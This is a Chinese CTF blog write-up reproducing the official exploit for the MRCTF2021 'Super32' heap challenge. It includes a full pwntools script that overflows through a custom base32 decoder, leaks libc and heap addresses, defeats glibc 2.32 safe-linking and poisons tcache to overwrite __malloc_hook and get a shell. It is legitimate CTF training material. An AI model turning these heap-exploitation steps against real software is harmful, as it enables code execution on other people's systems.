MRCTF2021&Super32官方exp的复现

最新推荐文章于 2023-06-09 22:20:18 发布
最新推荐文章于 2023-06-09 22:20:18 发布
阅读量345 收藏
点赞数
分类专栏: CTF PWN 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39948058/article/details/119938878
版权
CTF 同时被 2 个专栏收录
32 篇文章 2 订阅
订阅专栏
PWN
29 篇文章 0 订阅
订阅专栏

Mrctf&Super32官方exp复现

**前言:
说实话,这次MRCTF的比赛题的质量很高,高的我这种菜鸡都不太会做,所以赛后根据官方的exp来复现一下,这里只简绍一下exp的大概思路/
思路:我们要让其换表,也就是base32编码后再进行换表,换表后再与解码后的大小check进行替换,结果其大于预先程序设定的大小,这样就直接产生了溢出,这里官方的exp是溢出打top chunk的size,然后进行分配打tc chunk的fd进行malloc_hook为rce,就可以获得shell了。
相对于大佬来说 这道题不是很难,但对于我这种不会逆向代码分析的菜鸡难度可想而知,菜鸡的我最大的确定就是不熟练逆向分析导致很多题不会做,列如红名谷的题就是这样的,哎tcl**
Exp:

#!/usr/bin/python2
# coding=utf-8
from pwn import *
import base64
import string
 
local = 1
debug = 1
ip = '127.0.0.1'
port = 10001
proc = './pwn'
local_libc_path = '/home/root2/Desktop/glibc-all-in-one-master/libs/2.32-0ubuntu3.1_amd64/libc.so.6'
remote_libc_path = './libc-2.32.so'
 
 
def one_gadget(filename=remote_libc_path):
    return map(
        int,
        subprocess.check_output(['one_gadget', '--raw', filename]).split(' '))
 
 
if debug:
    context.log_level = 'debug'
 
if local:
    io = process(proc)
    libc = ELF(local_libc_path)
    try:
        one = one_gadget(local_libc_path)
    except:
        pass
else:
    io = remote(ip, port)
    libc = ELF(remote_libc_path)
    try:
        one = one_gadget()
    except:
        pass
elf = ELF(proc)
 
r = lambda x=4096: io.recv(x)
rl = lambda: io.recvline()
ru = lambda x: io.recvuntil(x)
rn = lambda x: io.recvn(x)
rud = lambda x: io.recvuntil(x, drop=True)
s = lambda x: io.send(x)
sl = lambda x: io.sendline(x)
sla = lambda x, y: io.sendlineafter(x, y)
sa = lambda x, y: io.sendafter(x, y)
ia = lambda: io.interactive()
su = lambda x: success('%s >> %s' % (x, hex(eval(x)))) if type(eval(
    x)) == int else success('%s >> %s' % (x, eval(x)))
 
 
def attach():
    su('io.pid')
    pause()
 
 
def encode(ctt):
    ru('>> ')
    sl(str(1))
    ru('Plz input ur code:')
    sl(ctt)
 
 
def decode(choice=1, ctt=''):
    ru('>> ')
    sl(str(2))
    ru('1.Get code from encode list.\n2.Input ur code.')
    sl(str(choice))
    if (choice == 2):
        ru('Plz input ur code:')
        sl(ctt)
 
 
def show():
    ru('>> ')
    sl(str(3))
 
 
def dele():
    ru('>> ')
    sl(str(4))
 
 
# get base32 table
dic = 'A1B2C3D4E5F6GHIJKLMNOPQRSTUVWXYZ'
str1= base64.b32decode('BBCDEFGHIJKLMNOPQRSTUVWXYZ234567')
//这里首先进行32位的base32解码
encode(str1) //利用程序的编码进行mallocchunk
print str1
 
show()
ru('Encode list:\n1.')
table = r(32)
for i in dic:
    if i not in table:
        table = i + table[1:]    //将其换表,我的理解这应该是base编码的特性,往往换表之后的字节会很大
su('table')
# get base32 table end
print table
# leak libc
for i in range(9):
    encode('a' * (0x70 / 8 * 5))  //申请9个0x90的chunk
 
for i in range(2):
    encode('aaaaa' * 8)  //申请了2个0x40的chunk
 
for i in range(1 + 7 + 1):
    decode()
 
    dele()   //free掉9个chunk,剩下一个会进入unsortbin
 
encode('123')   再次申请泄露libc基地址,这里会从unsortbin进行切割,切割出来的chunk会残留mainarren地址
 
show()
libc.address = u64(ru('\x7f')[-6:].ljust(8, '\x00')) - 0xf0 - libc.symbols['__malloc_hook']
free_hook_addr = libc.symbols['__free_hook']
one_addr = libc.address + one[1]
su('libc.address')
# leak libc end
 
 
# base32
def my_b32_decode(code):
    std_base32chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZ234567"
    code = code.translate(string.maketrans(table, std_base32chars)).replace(
        'm', '=').replace('r', '=').replace('c',
                                            '=').replace('t', '=').replace(
                                                'f', '=').replace('!', '=')
    return base64.b32decode(code)
 
 
def my_b32_encode(code):
    code = base64.b32encode(code)
    std_base32chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZ234567"
    code = code.translate(string.maketrans(std_base32chars, table))
    return code.replace('======', 'mrctf!').replace('====', 'ctf!').replace(
        '===', 'tf!').replace('=', '!')
//这里是在编码的时候把32位base64编码的时候后面的特性进行替换,从而加大解码时候的size可溢出,这里我也说不明白看程序源码就可以了,这里给于截图:
 
 
# base32 end
 
# change size 
decode()
dele()//这里下面的chunk会和并上一个unsortbinchunk,因为inuse位的原因
payload1 = my_b32_encode('a' * 0x80)
decode(2, payload1)  //利用切换的原理进行解码申请
 
payload2 = 'aaaaa' * 11 + 'a'+p8(0x71)
payload2 = my_b32_encode(payload2).replace('!', '')
decode(2, payload2)//再次申请剩下的chunk,将其!跟置空,因为在解码的时候解码表并没有!所以这个!无关紧要,这里我经过调试发现是修改了topchunk的size,但这里在本地测试了好多次才成功,完全看脸,orz!!!
 
# change size end
 
# structure chunk
for i in range(5):
    decode(2, my_b32_encode('a' * 0x40))
将其剩下的chunk5个编码
for i in range(7):
    dele()
然后再进行free
decode()  
dele()
 
decode()
dele()//将topchunk给free掉了,又助于我们下面打tc free
# structure chunk end
 
# leak heap base
decode(2, my_b32_encode('a' * 0x50))  //将其申请会留下heap地址,由于此libc版本是2.32版本所以fd被加密了,所以根据libc源码解密出来就能获取正确的heapbase了
show()
def get_heap_base(addr):    //这里是解密的算法,这种算法一般都是通用的,根据源码可以得知
    part1 = 0xfff000000000 & addr
    part2 = (0x000fff000000 & addr) ^ (part1>>12)
    part3 = (0x000000fff000 & addr) ^ (part2>>12)
    return part1 + part2 + part3
ru('a'*0x50)
heap_base = get_heap_base(u64(r(6).ljust(8,'\x00')))
su('heap_base')
# leak heap base
 
# getshell
dele()  //free掉chunk,帮助我们下面进行tc malloc hook为rce进行getshell,也就是传说的一把梭了orz
fd = (heap_base>>12)^(libc.symbols['__malloc_hook']-0x10)
su('fd')
payload3 = 'a' * 0x48 + p64(0x51) + p64(fd)
decode(2,my_b32_encode(payload3))
decode(2,my_b32_encode('a'*0x40))
decode(2,my_b32_encode(p64(one_addr).ljust(0x40,'a')))
encode('123')
ia()
# getshell end

**后缀:
至此官方exp分析完成,个人感觉出来个人的逆向能力太差劲了,所以以后会把大量的时间花学习逆向基础上,争取下一年的mrctf能够打出来成绩,还是tcl,志向有点小,加油吧,如果有错误的分析也欢迎各位大佬私聊我,毕竟tcl我,也是一种新手**

jsjsj11123
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
MRCTF 2021 8bit adventure
weixin_45966329的博客
04-14 318
MRCTF 2021 8bit adventure 程序大概的意思是只能用一个字节的汇编语句进行orw 要注意的是程序中使用了close(0),使用使用open系统调用时返回的文件描述符应该是0 懂汇编就会做 from pwn import * context(os='linux', arch='x86',log_level='debug') io=process("adventure") # ebx,ecx,edx # open 利用自加和自减控制寄存器的值,利用push和pop 还有修改esp 在栈上
[MRCTF2021]Web复现ez_larave1
Huamang的博客
04-20 928
ez_larave1 考察的是Laravel的CVE-2019-9081,影响版本为5.7.x get到一个新工具:BeyondCompare,用来比较文件差异的,可以比较方便的看出他做了哪些开发 把5.7.x的源码下载下来,比较一下,发现序列化! 有个小绕过,在serialize后随便加一点东西就可以了,比如serializeabc 与网上的poc不同,他的路由命名为hello了,在hello路由下可以执行反序列化 在网上找到的cve复现,看到漏洞是在PendingCommand.php出现的,跑去看
MRCTF 2021 Dynamic Debug
__ys的博客
04-15 308
Dynamic Debug (这是除了签到题我唯一能做的了,据说它还是出题人的失误 ) 得到ELF文件,先用虚拟机跑一下 丢进IDA 通过搜索字符串找到main函数 首先可以得知flag的长度为32,其次当我们继续分析会发现验证函数被添加了花指令,IDA无法识别。 这时我们动调一下就会发现动调后的代码发生了变化,可以初步判定为smc。 然后就可以找到一段极其像验证函数的代码 但是这一部分IDA没有分析,我们找到函数头P一下创建函数 发现F5后代码极其不可读,需要平衡一下堆栈,用keypatch在函
MRCTF2021 dynamic_debug新手详细复现
m0_51357657的博客
04-15 374
Dynamic_debug 一道惦记了很久的题,今天终于!历尽千辛万苦 复现出来,必须得记录了~~~根据题目,大概率要动调,看了官方wp知道了是smc(MR师傅tql),那确实得动调了,静态的话再怎么修复出来都是不对的。 以下详细记录一个新手废物怎么胡改乱改 修复代码的: (如果有错的地方请路过的师傅们指点!谢谢谢谢!) Step1, 按C强制转换 得到关键汇编代码部分,先随便找个大概位置下断,开始动调: 开始位置按P创建Function,在长度判断跳转处下断绕过 呃,提前说明哈,我是在看了官方wp知
MRCTF2021 ETH uncertainty
feng的博客
04-21 652
前言 昨天前天遇到的区块链题目有有些远超我目前的能力范围了,因此做的非常难受,决定先扔了,循序渐进,不好高骛远。突然想到MRCTF2021的那2道区块链自己还没有去复现,昨天想着去复现,今天发现MRCTF的站关了。。。利用着大师傅的WP上面的记录,找到了目标合约,进行复现。不过这题本身是没有给源码的,是需要逆向的,奈何我源码都读了几遍了才知道。。。没办法就直接拿着源码来复现叭。这题的难点其实还是逆向,直接看源码的话就会简单许多。 WP 源码: pragma solidity ^0.4.17; interf
MRctf 2021
m0_50967960的博客
04-15 196
MISC 零宽字符隐写:不可见的,不可打印的字符 https://blog.csdn.net/Amherstieae/article/details/108909743
实验-继承&super.pdf
04-03
java语言中的继承
java中this&super的用法小结.doc
最新发布
06-28
java中this&super的用法小结
32-bit-super-flowing-water-light.zip_32流水灯_super
09-24
标题中的“32-bit-super-flowing-water-light.zip”指的是一个包含32位超级流水灯程序的压缩文件。"32流水灯"是这个程序的核心功能,它是一种LED灯光效果,通常在电子工程和嵌入式系统中使用,用于创建视觉上的流动...
Fastjson 1.2.47 (远程代码执行)利用EXP进行漏洞复现
三天不打上房揭瓦的博客
12-26 2230
前言:小编也是现学现卖,方便自己记忆,写的不好的地方多多包涵,希望各位大佬多多批评指正。 目录漏洞概述漏洞复现环境准备利用过程避免踩坑防御方法 漏洞概述 漏洞复现 环境准备 1、一台windows10虚拟机 ip:192.168.0.110 作用:反弹shell的攻击机。 2、一台kali20(任意版本)的虚拟机 ip:192.168.0.111 作用:搭建Web和RMI服务的机器。 3、一台Ubuntu,装好vulhub靶场的虚拟机 ip:192.168.0.115 作用:搭建漏
2021-04-06,[MRCTF2020]PYWebsite,[MRCTF2020]pyFlag
探针一号的博客
04-07 533
1
[MRCTF 2021]wwwafed_app
fightte的博客
05-18 402
之前打的MRCTF,没做出来什么题,也算是一种体验了~ 这是大佬带出来的一道题: 进去之后是一个前端界面,先看前端,有一个输入框,输入域名来检测是否能连通,右上角,有一个waf source,可以点击: 得到和waf有关的源码: import re,sys import timeout_decorator @timeout_decorator.timeout(5) def waf(url): # only xxx.yy-yy.zzz.mrctf.fun allow pat = r'
[MRCTF2021]ez_laravel复现
fightte的博客
05-21 591
前言 还是之前打的mrctf,难度比较大,也是第一次正式比赛出现了lara题目,近来多数比赛,包括CISCN都习惯出lara的题目,算是比较好的框架,但当时被带的做起了,现在复现一次: 考察的是Laravel的CVE-2019-9081,影响版本为5.7.x,当时别个搜CVE也能搜出来,先下载下来,lara5.7 但lara5.7里面没有vendor,在文件夹下,用cmd命令 composer install就可产生: 开始对比: 主要差别确实就是MRCTF的www_laravel,其app/Http/
2021-03-31,[GYCTF2020]Blacklist,[MRCTF2020]Ez_bypass
探针一号的博客
03-31 253
1
MRCTF复现
weixin_44377940的博客
04-02 1134
目录Misc千层套路ezmiscWebEzpop套娃pyflagez_bypass传马ez_auditEzpop_Revenge Misc 千层套路 和BJDCTF的一题一样,密码为文件名,重复解压,脚本跑就完事了。 ezmisc 修改行高。 Web Ezpop 点开即可看到源码,如下: <?php //flag is in flag.php //WTF IS THIS? //Learn...
MRCTF部分题的总结与复现
qwzf
04-10 9080
0x00 前言 题目整体来说不太难,毕竟是个新生赛。但考察的知识点等方面,确实需要总结一下。于是我总结了部分MISC、Crypto和Web。
MRCTF 2020 Crypto writeup
Slightwind's Blog
03-29 2583
MRCTF 2020 Crypto writeup
mrctf2020_shellcode详解
勿山几已
06-09 557
简单演示mrctf2020_shellcode解题步骤
2022MRCTF-wp
qq_45603443的博客
04-27 658
2022MRCTF-wpWebJust HackingGod_of_GPAWebCheckInJava_mem_shell_BasicJava_mem_shell_FilterMiscpddConnecting...Tip Web Just Hacking 爆出密码foobared redis getshell 在root目录docker config发现账号密码。 登录发现私有镜像 本地运行getflag God_of_GPA 笔记页面有dom xss 认证的地方存在xss 可把token发到其他地
superpoint transformer复现
09-22
复现 SuperPoint Transformer 需要获取官方没有提供的 SuperPoint 的训练和评估代码,以及合成数据集 Synthetic Shapes。SuperPoint Transformer 是通过 SuperPoint 提取特征点和描述符,再利用 SuperGlue 进行特征...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值